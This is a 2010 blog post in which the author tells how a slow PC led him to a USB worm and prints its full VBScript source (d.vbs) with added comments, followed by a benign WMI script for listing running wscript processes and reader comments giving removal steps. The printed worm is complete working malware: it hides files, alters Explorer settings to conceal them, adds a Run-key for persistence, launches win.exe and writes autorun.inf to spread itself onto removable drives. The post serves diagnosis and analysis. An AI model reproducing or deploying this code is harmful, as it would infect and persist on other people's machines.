Breaking News

Sunday, July 25, 2010

VB Script: How to create a virus?

Since quite a couple of weeks I was having slow PC; and eventually dying for a restart. I turned off all of the windows services, I removed all un-necessary software and even those that were necessary but having low usage-frequency. Still to no avail. Then I went through my registry to cleanup unwanted run and run once's.

As I turn on the computer I could see a lot of wscript's running, about tens of them, hogging my CPU and memory like anything. I thought it might be network policy imposed by network department; I used to close all of the running scripts one by one. But an eventual talk to network admin revealed that no PC "runs" the policy on PC start-up, and that they do not have to do anything with the wscript.exe scripts.

Running Symantec EndPoint Protection software that has an up-to-date virus definitions, I could not imagine a virus in my pc.

Most people think that WScript.EXE is a virus, which it is not. Its a windows script hosting(WSH) software. Also, I have used WScript quite a couple of times myself, and probably so is the reason I never thought of removing that exe.

It can potentially execute commands(VB or JScript) that you may not want/desire.

Following is a simple example taken from MSDN, to write in registry.
Dim WshShell, bKey
Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\", 1, "REG_BINARY"
WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\MindReader", "Goocher!", "REG_SZ"

bKey = WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\")
WScript.Echo WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\MindReader")

WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\MindReader"
WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\"
WshShell.RegDelete "HKCU\Software\ACME\"

So, long story short, this always used to happen when it insert my flash drive in the system. Couple of days ago, I cancelled the Action window that pops up when you insert a flash drive. I browsed the drive using Control+E (Windows Explorer) and to my astonishment I found a .VBS file; which is basically the VB Script file. I renamed the file and opened it. It was the code that was hogging my PC!

Though, I did not like the slow the PC at all, because I couldnt work; but interestingly I did enjoy reading the code (0:

Following is what I found when I opened d.vbs file; I have added a couple of comments just for the reader to better understand the code.

On Error Resume Next
set objfso=CreateObject("Scripting.fileSystemObject" 'causes execution to continue with the statement
Set ws = CreateObject("wscript.Shell") ' Create a shell object
Set sh = CreateObject("Shell.application")
sour="C:\Tempe"
if objfso.FolderEXists(sour) Then ' Look for a folder
set tf =objfso.getFolder(sour)
tf.Attributes=39
End If

a=0
b=10
c=10

'Tweaking the registry
ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Explorer", sour & "\" &"d.vbs"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
if a=0 Then

if objfso.FileExists("C:\Tempe\win.exe") Then
ws.Run("C:\Tempe\win.exe")
end if
end if

Do
For Each flashdrive In objfso.drives
   If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path<>"A:" Then

If (flashdrive.drivetype = 1) Then 
pet=flashdrive.path & "\"

set tf=objfso.createtextfile(pet & "autorun.inf")
tf.writeline "[autorun]"
tf.writeline "shellexecute=wscript.exe d.vbs"
tf.writeline "shell=Open"
tf.writeline "Shell\Open\Command=wscript.exe d.vbs"
tf.writeline "Action=Open to View Folder"
tf.writeline "Icon=tere.ico"
tf.close
set tf =objfso.getfile(pet & "autorun.inf")
tf.Attributes=39

if objfso.FileExists(pet&"autorun.inf") Then
set f = objfso.getfile(pet&"autorun.inf")
size = f.size
set text=f.openastextstream(1,-2)
do while not text.atendofstream
source=source&text.readline
source=source & vbcrlf
loop
end if
if tf=source Then
sour="C:\Tempe"
Else
set f = objfso.getfile(pet&"autorun.inf")
objfso.DeleteFile(f)
End If

If a=0 Then
ws.Run(pet)
ws.run(pet&"win.exe")
End If
a=a+1
sour="C:\Tempe"
pet=flashdrive.path & "\" 
dest=flashdrive.path & "\Tempe" 
sours="C:\Tempe\"

if a=3 Then
If objfso.FileExists(pet&"autorun.inf") Then
objfso.DeleteFile(pet&"autorun.inf")

set Fol=objfso.GetFolder(sour)
set tf=objfso.createtextfile(pet & "autorun.inf")
tf.writeline "[autorun]"
tf.writeline "shellexecute=wscript.exe d.vbs"
tf.writeline "shell=Open"
tf.writeline "Shell\Open\Command=wscript.exe d.vbs"
tf.writeline "Action=Open to View Folder"
tf.writeline "Icon=tere.ico"
tf.close

set tf =objfso.getfile(pet & "autorun.inf")
tf.Attributes=39

End If
End If

If objfso.FileExists(pet&"d.vbs") Then
sour="C:\Tempe"
Else
set Fol=objfso.GetFolder(sour)
set f=objfso.GetFile(Fol&"\d.vbs")
objfso.CopyFile f, pet, OverWriteFiles
set f =objfso.getfile(pet & "d.vbs")
f.Attributes=39

set f=objfso.GetFile(Fol&"\win.exe")
objfso.CopyFile f, pet, OverWriteFiles
set f =objfso.getfile(pet & "win.exe")
f.Attributes=39

set f=objfso.GetFile(Fol&"\tere.ico")
objfso.CopyFile f, pet, OverWriteFiles
set f =objfso.getfile(pet & "tere.ico")
f.Attributes=39
set tf=objfso.createtextfile(pet & "autorun.inf")
tf.writeline "[autorun]"
tf.writeline "shellexecute=wscript.exe d.vbs"
tf.writeline "shell=Open"
tf.writeline "Shell\Open\Command=wscript.exe d.vbs"
tf.writeline "Action=Open to View Folder"
tf.writeline "Icon=tere.ico"
tf.close
set tf =objfso.getfile(pet & "autorun.inf")
tf.Attributes=39

set mf = objfso.getfile(pet&"autorun.inf")
size = mf.size
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
source=source&text.readline
source=source & vbcrlf
loop
End If

If objfso.FolderExists (sour) Then
set Fol=objfso.GetFolder(sour)
End If

If objfso.FileExists("C:\Tempe\d.vbs") Then
sour="C:\Tempe"
Else
set tf=objfso.createFolder("C:\"& "Tempe")
set Fol=objfso.GetFolder(sour)
Fol.Attributes=39
set f=objfso.GetFile(pet&"d.vbs")
objfso.CopyFile f, sours, OverWriteFiles
set f =objfso.getfile(sour & "\d.vbs")
f.Attributes=39
set f=objfso.GetFile(pet&"tere.ico")
objfso.CopyFile f, sours, OverWriteFiles
set f =objfso.getfile(sour & "\tere.ico")
f.Attributes=39
set f=objfso.GetFile(pet&"win.exe")
objfso.CopyFile f, sours, OverWriteFiles
set f =objfso.getfile(sour & "\win.exe")
f.Attributes=39
End If

set mf = objfso.getfile(pet&"autorun.inf")
size = mf.size
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
source=source&text.readline
source=source & vbcrlf
loop
if a=3 Then
a=1
End If
End If
End If
Next
if check<>1 Then
Wscript.sleep 10000
end if
 
set mf = objfso.getfile(Wscript.ScriptFullname)
size = mf.size
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
source=source&text.readline
source=source & vbcrlf
loop
Loop While (check <> 1) 

Happy diagnosing the virus! (0:

NOTE:

If you see alot of wscript.exe's running on your machine, and you still doubt their actions; copy and paste the following code into Check for virus.VBS file, and double click to run it.

The following code prints, in form of message box, all of the scripts that is being run under wscript.exe program.

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = 'cscript.exe'" & _
        " OR Name = 'wscript.exe'")
For Each objItem in colItems
    Wscript.Echo objItem.CommandLine
Next


Keep on pressing the OK button to see the list of scripts being run under wscripts.exe

Enjoy!

6 comments:

  1. Anonymous2:16 AM

    whats the output?

    ReplyDelete
  2. Anonymous2:18 AM

    i mean what that vbs do?

    ReplyDelete
  3. Silently hogging my machine, to be very precise.

    ReplyDelete
  4. ok thx Kman..
    :)
    nice blog

    ReplyDelete
  5. Anonymous8:30 AM

    I've just found this running on one of our client workstations at the office.

    As far as I can work out, it:
    1 - ensures that a folder called c:\tempe exists and that a copy of d.vbs exists within it
    2 - marks the folder and files as hidden
    3 - turns off hidden folder view in windows explorer
    4 - creates an entry in HKCU\Software\Microsoft\Windows\Currentversion\Run
    5 - consumes 99% system resources

    It's easy to remove, just terminate the process, remove the c:\tempe folder & all contents, then remove the Run entry from the registry.

    ReplyDelete
  6. You can run the script in the edited section above to see what scripts are being run from which location.

    ReplyDelete

Designed By Published.. Blogger Templates